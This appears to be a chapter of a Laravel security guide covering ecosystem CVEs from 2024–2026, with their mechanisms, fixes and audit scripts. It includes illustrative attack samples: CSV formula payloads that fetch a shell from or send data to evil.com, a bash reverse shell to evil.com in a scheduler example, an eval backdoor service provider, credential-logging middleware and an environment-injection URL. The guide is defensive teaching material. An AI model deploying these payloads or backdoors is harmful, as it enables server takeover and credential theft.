🔒 Hacked
Chapter 6

The 12 CVEs every Laravel developer must know

Your Laravel application isn’t just your code. It’s built on a tower of dependencies: the framework itself, Livewire, Filament, Pulse, Nova, and dozens of Composer packages. Any vulnerability in that tower compromises your entire application.

This chapter documents the most critical CVEs affecting the Laravel ecosystem in 2024-2026. Some of these allow unauthenticated remote code execution. If you’re running vulnerable versions, your server is likely already compromised.

2
Critical RCE
5
High Severity
5
Config Vulns

The threat landscape (2024-2026)

The Laravel ecosystem has seen a significant shift in attack vectors:

CategoryFrequencyImpactPrimary Vector
RCE via Hydration/DeserializationHighCriticalManipulated JSON payloads in Livewire/Pulse
Authentication BypassMediumCriticalFlawed MFA logic (Filament)
Environment InjectionLowHighargv manipulation in non-standard configs
CSV/Formula InjectionPersistentMediumUnsanitized data exports
💀

Attackers Are Scanning for These

Automated scanners probe for vulnerable Livewire and Pulse installations daily. These CVEs are actively exploited in the wild. Check your versions NOW.

Critical CVEs (CVSS 9.0+)

These vulnerabilities allow unauthenticated remote code execution. If you’re running affected versions, assume compromise until proven otherwise.

CVE-2025-54068: Livewire Hydration Smuggling RCE

CVE-2025-54068 critical
CVSS: 9.8

Remote Code Execution via Hydration Smuggling

Package: livewire/livewire Affected: 3.0.0 - 3.6.3

Impact: Attackers can execute arbitrary code on your server without authentication.

Mechanism: Livewire’s property hydration process deserializes JSON payloads without proper validation. An attacker can craft malicious JSON that, when hydrated, instantiates arbitrary PHP objects - leading to RCE through gadget chains.

Remediation: Update to Livewire 3.6.4+ or 2.12.7+ IMMEDIATELY. No workaround exists.

How the attack works:

1. Attacker identifies Livewire component
2. Intercepts/modifies wire:snapshot JSON payload
3. Injects serialized malicious object
4. Livewire deserializes without validation
5. Object instantiation triggers RCE via __wakeup() or __destruct()
Vulnerable Component Pattern MALICIOUS CODE 
// ANY Livewire component with public properties is vulnerable
class UserProfile extends Component
{
  public $userData;  // Can be manipulated via hydration
  public $settings;  // Attacker controls the type

  public function render()
  {
      return view('livewire.user-profile');
  }

}

// Attacker sends modified wire:snapshot:
// {"userData":{"__PHP_Incomplete_Class_Name":"GadgetClass",...}}

Indicators of Compromise:

Detection Pattern for composer.lock:

/livewire\/livewire.*"version":\s*"3\.[0-5]\./

CVE-2024-55661: Laravel Pulse RCE via remember()

CVE-2024-55661 critical
CVSS: 9.1

RCE via Public remember() Method

Package: laravel/pulse Affected: < 1.3.1

Impact: Remote code execution through the Pulse dashboard.

Mechanism: The remember() method in Pulse’s Livewire trait was publicly accessible, allowing attackers to poison the cache with malicious serialized data that gets executed when retrieved.

Remediation: Update to Pulse 1.3.1+. Restrict dashboard access via Gates.

Attack Vector:

1. Attacker accesses Pulse dashboard (if not properly secured)
2. Calls remember() with malicious callback
3. Callback is serialized and stored in cache
4. On next retrieval, malicious code executes
🚨

Dashboard Access = Server Access

If your Pulse dashboard is accessible without authentication, you have bigger problems than this CVE. Always secure monitoring dashboards.

High severity CVEs (CVSS 7.0 - 8.9)

These vulnerabilities can lead to authentication bypass, privilege escalation, or sensitive data exposure.

CVE-2025-67507: Filament MFA Bypass

CVE-2025-67507 high
CVSS: 8.5

MFA Authentication Bypass via Recovery Code Reuse

Package: filament/filament Affected: 4.0.0 - 4.3.0

Impact: Multi-factor authentication can be bypassed by reusing recovery codes.

Mechanism: After a recovery code is used, it’s not invalidated. An attacker with a leaked recovery code can use it unlimited times.

Remediation: Update to Filament 4.3.1+. Rotate ALL recovery codes for existing users.

The Bug:

// VULNERABLE: Recovery codes are not invalidated after use
public function validateRecoveryCode($code)
{
    return in_array($code, $user->recovery_codes);
    // Missing: Remove used code from array!
}

// FIXED: Proper implementation
public function validateRecoveryCode($code)
{
    if (!in_array($code, $user->recovery_codes)) {
        return false;
    }

    // Invalidate the used code
    $user->recovery_codes = array_filter(
        $user->recovery_codes,
        fn($c) => $c !== $code
    );
    $user->save();

    return true;
}

CVE-2024-52301: Environment Variable Injection

CVE-2024-52301 high
CVSS: 8.7

Environment Injection via argv

Package: laravel/framework Affected: Multiple versions (see below)

Impact: Attackers can manipulate Laravel environment variables via query strings.

Mechanism: When PHP’s register_argc_argv=On, query string parameters are parsed as command-line arguments. Laravel reads these, allowing attackers to set APP_ENV=local or APP_DEBUG=true via URL.

Remediation: Update Laravel. Set register_argc_argv=Off in php.ini.

Affected Versions:

Attack Example:

https://example.com/?APP_ENV=local&APP_DEBUG=true

With register_argc_argv=On, this sets:
- APP_ENV → local (bypasses production security)
- APP_DEBUG → true (enables CVE-2024-13919 XSS)

Check Your PHP Configuration:

// Run this on your server
if (ini_get('register_argc_argv') === '1') {
    echo "VULNERABLE! Set register_argc_argv=Off in php.ini";
}

CVE-2024-13919: Debug Page XSS

CVE-2024-13919 high
CVSS: 7.5

Reflected XSS in Debug Error Page

Package: laravel/framework Affected: 11.9.0 - 11.35.x

Impact: Cross-site scripting on the Laravel debug error page.

Mechanism: When APP_DEBUG=true, the error page reflects unsanitized input, allowing script injection.

Remediation: Update to Laravel 11.36.0+. Ensure APP_DEBUG=false in production.

ℹ️

Debug Mode + Environment Injection = Chained Attack

CVE-2024-52301 + CVE-2024-13919 can be chained: 1. Use environment injection to enable debug mode 2. Trigger an error 3. Inject XSS payload via debug page

CVE-2025-27515: Authorization Bypass via Gates

CVE-2025-27515 high
CVSS: 8.1

Authentication Bypass via Misconfigured Gates

Package: laravel/framework Affected: Multiple

Impact: Authorization bypass through improperly defined Gates.

Mechanism: Certain Gate configurations can be bypassed, allowing unauthorized access to protected resources.

Remediation: Update framework. Audit all Gate definitions for logic flaws.

Audit Your Gates:

// Review all Gate definitions in AuthServiceProvider
Gate::define('admin', function ($user) {
    // VULNERABLE: No explicit return false
    if ($user->is_admin) {
        return true;
    }
    // Missing: return false;
});

// SECURE: Always explicitly return
Gate::define('admin', function ($user) {
    return $user->is_admin === true;
});

CVE-2025-54082: Laravel Nova Vulnerability

CVE-2025-54082 high
CVSS: 7.8

Security Vulnerability in Admin Panel

Package: laravel/nova Affected: Multiple versions

Impact: Security vulnerability in the Nova admin panel.

Remediation: Update to latest Nova version. Audit all third-party Nova packages.

Medium severity CVEs

These vulnerabilities require specific conditions but can still cause significant damage.

CVE-2025-55745: CSV Formula Injection

CVE-2025-55745 medium
CVSS: 6.5

CSV Formula Injection

Package: maatwebsite/excel Affected: Multiple versions

Impact: Client-side RCE when users open exported CSV/Excel files.

Mechanism: Fields starting with =, +, -, @, or tab characters are interpreted as formulas by Excel. Malicious formulas can execute commands.

Remediation: Prefix dangerous characters with apostrophe during export.

Payload Example:

=cmd|'/C calc'!A0
=HYPERLINK("http://evil.com/steal?d="&A1)
+cmd|'/C powershell IEX(wget evil.com/shell)'!A0

Fix:

// Sanitize before export
public function sanitizeForExcel($value): string
{
    $dangerousChars = ['=', '+', '-', '@', "\t", "\r"];

    if (isset($value[0]) && in_array($value[0], $dangerousChars)) {
        return "'" . $value;  // Prefix with apostrophe
    }

    return $value;
}

Spatie Media Library XSS (Issue #3865)

SPATIE-ML-3865 medium
CVSS: 6.1

XSS via Unsanitized HTML Attributes

Package: spatie/laravel-medialibrary Affected: Multiple versions

Impact: Cross-site scripting through unsanitized HTML attributes in Blade components.

Remediation: Explicitly sanitize custom attributes before passing to media library components.

Configuration vulnerabilities

These aren’t CVEs but are equally dangerous misconfigurations found in production Laravel applications.

CONFIG-001: Debug Mode in Production

💀

The #1 Laravel Security Mistake

43% of compromised Laravel sites had APP_DEBUG=true in production. This single setting exposes: environment variables, database credentials, full stack traces, and enables multiple CVEs.

Check:

// This should NEVER be true in production
if (config('app.debug') && config('app.env') === 'production') {
    // YOU ARE VULNERABLE
}

CONFIG-002: Debugbar in Production

RiskDetails
Environment VariablesAll .env values visible
SQL QueriesFull queries with bindings
Session DataComplete session contents
Request DataAll POST/GET parameters

Fix:

# Install only in require-dev
composer require barryvdh/laravel-debugbar --dev

# .env (explicit disable)
DEBUGBAR_ENABLED=false

CONFIG-003: APP_KEY Exposure

🚨

APP_KEY = Server Compromise

If your APP_KEY is leaked, attackers can: - Decrypt all encrypted data - Forge session cookies - Execute RCE via deserialization (phpggc gadget chains) - Access user accounts without passwords

Never commit .env to git:

# .gitignore (REQUIRED)
.env
.env.backup
.env.*.local

If your APP_KEY was ever exposed:

# 1. Generate new key
php artisan key:generate

# 2. Invalidate all sessions
php artisan session:flush
php artisan cache:clear

# 3. Re-encrypt sensitive data (if you used encrypt())
# This requires custom migration

# 4. Rotate all API tokens/passwords

CONFIG-004: Telescope in Production

Laravel Telescope logs every request, query, job, and exception. If accessible in production:

Exposed DataRisk
Request bodiesCredentials, API keys in POST data
Database queriesTable structure, data
Job payloadsInternal system information
Exception tracesFull code paths

Secure Telescope:

// app/Providers/TelescopeServiceProvider.php
protected function gate()
{
    Gate::define('viewTelescope', function ($user) {
        return in_array($user->email, [
            'admin@yourdomain.com',
        ]);
    });
}

CONFIG-005: register_argc_argv Enabled

This PHP setting enables CVE-2024-52301:

; php.ini - MUST be Off
register_argc_argv = Off

Check all servers:

php -i | grep register_argc_argv

Laravel-specific attack patterns

Beyond CVEs, attackers target Laravel’s architecture:

Malicious Service Providers

Service providers run on every request. A compromised provider = persistent backdoor.

// MALICIOUS: Backdoor in service provider
class EvilServiceProvider extends ServiceProvider
{
    public function boot()
    {
        if (request('backdoor') === 'secret') {
            eval(request('cmd'));  // Runs on EVERY request
        }
    }
}

Detection: Scan app/Providers/*.php for eval, shell_exec, system.

Malicious Middleware

Middleware intercepts all HTTP requests - perfect for credential stealing.

// MALICIOUS: Credential stealing middleware
class ShadowMiddleware
{
    public function handle($request, $next)
    {
        if ($request->has('password')) {
            // Exfiltrate credentials
            file_put_contents('/tmp/.shadow',
                $request->email . ':' . $request->password . "\n",
                FILE_APPEND
            );
        }
        return $next($request);
    }
}

Poisoned Scheduled Commands

Cron jobs run with server privileges:

// MALICIOUS: Reverse shell in scheduler
$schedule->exec('bash -i >& /dev/tcp/evil.com/4444 0>&1')
    ->everyMinute();

Audit your Kernel.php regularly.

Vulnerability checklist

Run these checks on every Laravel application:

Immediate Actions

# 1. Check Livewire version
composer show livewire/livewire | grep version
# Must be >= 3.6.4 or >= 2.12.7

# 2. Check Pulse version
composer show laravel/pulse | grep version
# Must be >= 1.3.1

# 3. Check Filament version
composer show filament/filament | grep version
# Must be >= 4.3.1

# 4. Run Composer audit
composer audit

# 5. Check PHP configuration
php -i | grep register_argc_argv
# Must be Off

Configuration Audit

// Run in tinker or create a command
$issues = [];

if (config('app.debug') && config('app.env') === 'production') {
    $issues[] = 'CRITICAL: APP_DEBUG=true in production';
}

if (config('debugbar.enabled')) {
    $issues[] = 'HIGH: Debugbar enabled';
}

if (ini_get('register_argc_argv') === '1') {
    $issues[] = 'HIGH: register_argc_argv=On (CVE-2024-52301)';
}

if (file_exists(base_path('.env')) && is_readable(base_path('.env'))) {
    $envContent = file_get_contents(base_path('.env'));
    if (strpos($envContent, 'APP_KEY=base64:') === false) {
        $issues[] = 'CRITICAL: APP_KEY not properly set';
    }
}

foreach ($issues as $issue) {
    echo "❌ {$issue}\n";
}

if (empty($issues)) {
    echo "✅ Basic security checks passed\n";
}

Summary

The Laravel ecosystem faced critical vulnerabilities in 2024-2026:

9.8
Highest CVSS (Livewire)
6
Framework Updates Required

Priority Actions:

  1. Update Livewire to 3.6.4+ (CVE-2025-54068 - CRITICAL)
  2. Update Pulse to 1.3.1+ (CVE-2024-55661 - CRITICAL)
  3. Update Filament to 4.3.1+ and rotate recovery codes
  4. Update Laravel to latest patch version
  5. Set register_argc_argv=Off in php.ini
  6. Ensure APP_DEBUG=false in production
  7. Never enable Debugbar in production
  8. Protect APP_KEY - never commit to git

Remember: These CVEs are actively exploited. If you’re running vulnerable versions, assume your server needs forensic analysis.

Next: Chapter 7 - 40 Security Checks for Your Laravel Application

Now you know the CVEs. The next chapter provides a comprehensive checklist to audit your entire Laravel application - from authentication to file uploads to API security.